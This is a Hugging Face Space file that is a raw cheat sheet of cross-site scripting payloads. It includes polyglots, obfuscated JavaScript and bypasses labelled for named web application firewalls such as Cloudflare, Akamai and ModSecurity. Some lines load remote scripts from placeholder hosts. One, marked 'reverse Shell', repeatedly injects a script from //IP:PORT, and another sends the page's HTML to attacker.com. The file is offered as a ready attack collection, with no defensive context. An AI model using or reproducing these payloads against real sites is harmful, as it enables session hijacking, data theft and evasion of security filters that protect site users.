Hugging Face's logo

Spaces:
asbeabi
/
PoCs
Running

App Files Community
1
PoCs / \"}));booq
asbeabi's picture
asbeabi
Update \"}));booq
a415fa4
raw
history blame contribute delete
7.79 kB
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Hi'&gt;"<script src="//xss-server"></script><x="{9*9}\r\n%0a%09%0d<svg\onload=confirm(1)>
<x/onclick=alert``>
"><img src onerror=alert(1)>
<--`<img/src=` onerror=alert(3)> --!>
" autofocus onfocus=alert(4) fragment="
" onclick=alert`5` fragment="
<details/open ontoggle=alert(6)>
<svg/onload=alert`7`>
><svg/onload=confirm``>"@yahoo.com
</div><img/**/src/**/onerror=alert(1)>
<Svg%K9OnLoad=%7Krompt%6K1%6K>
"'`><svg/onload=alert`1234`>
๐’€€='',๐’‰บ=!๐’€€+๐’€€,๐’€ƒ=!๐’‰บ+๐’€€,๐’‡บ=๐’€€+{},๐’Œ=๐’‰บ[๐’€€++],
๐’€Ÿ=๐’‰บ[๐’ˆซ=๐’€€],๐’€†=++๐’ˆซ+๐’€€,๐’น=๐’‡บ[๐’ˆซ+๐’€†],๐’‰บ[๐’น+=๐’‡บ[๐’€€]
+(๐’‰บ.๐’€ƒ+๐’‡บ)[๐’€€]+๐’€ƒ[๐’€†]+๐’Œ+๐’€Ÿ+๐’‰บ[๐’ˆซ]+๐’น+๐’Œ+๐’‡บ[๐’€€]
+๐’€Ÿ][๐’น](๐’€ƒ[๐’€€]+๐’€ƒ[๐’ˆซ]+๐’‰บ[๐’€†]+๐’€Ÿ+๐’Œ+"(๐’€€)")()
<script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script> ==> reverse Shell
<iframe/src=j%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0t:prompt `1`> --> test it
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> --> ModSecurity bypass
javascript:alert(1)
'-alert(1)-'
'-alert(1)//
`-alert(1)//\
\'-alert(1)//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
\u0027-confirm`1`-\u0027
"; ||confirm('XSS') || "
'*prompt(1)*'
${alert(1)}
{{32*32}}
""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
"])},alert(1));(function xss() {//
'?prompt`1`?'
" onmouseover=alert(/@darknetguy/)
" onclick=alert(1)//">click
" autofocus onfocus=alert(1) "
" onfocus=prompt(1) autofocus fragment="
" onfocus=prompt(1) onmouseover="confirm(1) " style="position:absolute;width:100%;height:100%;top:0;left:0;"
" onmousemove=alert(/@darknetguy/)//">Milad
"><svg onload=alert(1)>.gif
http://www.<svg/onload=ConFirm`1`>.com
"><svg/onload=confirm(1)>"@yahoo.com
<form action=javascript:alert(1)//
<form><button formaction=javascript&colon;alert(1)>xss
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<form id="test" /><button form="test" formaction="javascript:alert()">xss
<object data="data:text/html,<script>alert(5)</script>">
<iframe srcdoc="<svg onload=alert(4);>">
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<iframe src='jAvAsCripT:(alert)()'></iframe>
<script%20~~~>\u0061\u006C\u0065\u0072\u0074``</script%20~~~>
<?tag x="-->" test="<img src=x onerror=alert(1)//">
bypass alert filter:
(alert)(1)
a=alert,a(2)
[3].find(alert)
al\u0065rt(4)
alert`5`
[6].map(alert)
[7].every(alert)
[8].filter(alert)
[9].findIndex(alert)
[10].forEach(alert)
self['alert'](11)
parent['alert'](12)
window['alert'](13)
Wordfence 7.4.2
<a href=&#01javascript:alert(1)>
Sucuri CloudProxy (POST only)
<a href=javascript&colon;confirm(1)>
ModSecurity CRS 3.2.0 PL1
<a href="jav%0Dascript&colon;alert(1)">
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<script>eval(location.hash.slice(2))</script> and end of url ==> #alert("testtesttestets")
<script>
x='<%'
</script> %>/
alert(2)
</script>
/<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> ---> cloudflare {`XSSยด} ยซbyPASSยป
/<svg%0Aonauxclick=0;[1].some(confirm)//
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML"> ===> send current page's source to attacker site
===> use < diffrent way
">'><details/open/ontoggle=confirm('XSS')> ===> maybe WAF bypasser (Test it)
<object/data="javascript&colon;alert/**/(document.domain)">// ===> Bypass CloudFront WAF
%3c<aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e ===> maybe WAF bypasser (Test it)
<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)"> ===> maybe WAF bypasser (Test it)
"><input/onauxclick="[1].map(prompt)"> ==> Sucuri WAF XSS bypass
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> ===> CloudFront XSS bypass
1'"><img/src/onerror=.1|alert``> ===> Cloudflare #XSS #Bypass via dot
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
<select><noembed></select><script x=โ€™a@bโ€™a>y=โ€™a@bโ€™//a@b%0a\u0061lert(1)</script x>
<a+HREF=โ€™%26%237javascrip%26%239t:alert%26lpar;document.domain)โ€™>
<!--><svg onload=alert(1)--> ===> bypass if comments are allowed
<svg onload="alert(1)" <="" svg=""
<svg onload=alert(1)//
<sVg/oNloAd=โ€JaVaScRiPt:/**\/*\โ€™/โ€\eval(atob(โ€˜Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==โ€™))โ€>
<iframe src=jaVaScrIpT:eval(atob(โ€˜Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==โ€™))>
** ๐—”๐—ธ๐—ฎ๐—บ๐—ฎ๐—ถ [๐—ž๐—ข๐—ก๐—” ๐—ฆ๐—ถ๐˜๐—ฒ ๐——๐—ฒ๐—ณ๐—ฒ๐—ป๐—ฑ๐—ฒ๐—ฟ] ๐—ช๐—”๐—™ ๐—•๐˜†๐—ฝ๐—ฎ๐˜€๐˜€ **
<tiger/onpointerrawupdate=this['innerHTML']=unescape(location.hash);>XSS Me#<img src=x onerror=alert(0)>
<a href=โ€j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this[โ€˜documentโ€™][โ€˜cookieโ€™]&rpar;โ€>X</a> ==> Cloudflare Bypass
javascript:โ€/*โ€™/*`/* โ†’<html \โ€ onmouseover=/*&lt;svg/*/onload=alert()//>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'> ===> Akamai waf bypass
</script><svg><script>alert(1)%0A--> ===> It must land where JS syntax is not affected though
<link rel=import href='.&#47"><svg%20onload=alert(domain)>'>
<iframe src="javascript:alert(1)%%0D3C!--
<iframe src="javascript:alert(1)%%0D3C--
"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
<--` <body/onload=&lt;!--&gt;&#10alert(1)> --!>
i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(\1\)\'\s\rc\=\'e\'\20\>{
<script src=data:,alert(1)>
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
xโ€</title><img src%3dx onerror%3dalert(1)>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
<dETAILS%0Aopen%0AonToGgle%0A=%0Aa=prompt,a() x>
<svg onunload=http://window.open('javascript:alert(1)')>
XSS'\x22"%22>4<%\u0022/* ===> locator!
<ScRiPt src=https://yoursite.com/XSS.js>
<style/onload=alert(0)>
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0) ==> injecting into src attributes, you need a javascript URI payload
===> AWS WAF bypass
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ยด} ==> cloudflare ยซXSSยป payload to bypass protection
IE weird behavior:
<iframe id=element></iframe>
<script>
element.alert(1)
</script>
parentheses free payload by @aemkei
<script>
onload=setTimeout
Event.prototype.toString=
_=>"alert\501\51"
</script>
<</div>script</div>>alert()<</div>/script</div>>
<</div> %3c script</div>>alert()<<</div>/script</div>
</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
#Akamai #Bypass #XSS #BugBounty
Found a working #xss payload after a brainstorming for a long #time.
#Tested in many sites with alexa ranking below #1000
Cloudflare WAF working again...
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>
One to bypass Cloudflare WAF by @JacksonHHax
<svg onload=alert%26%230000000040"1")>
<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C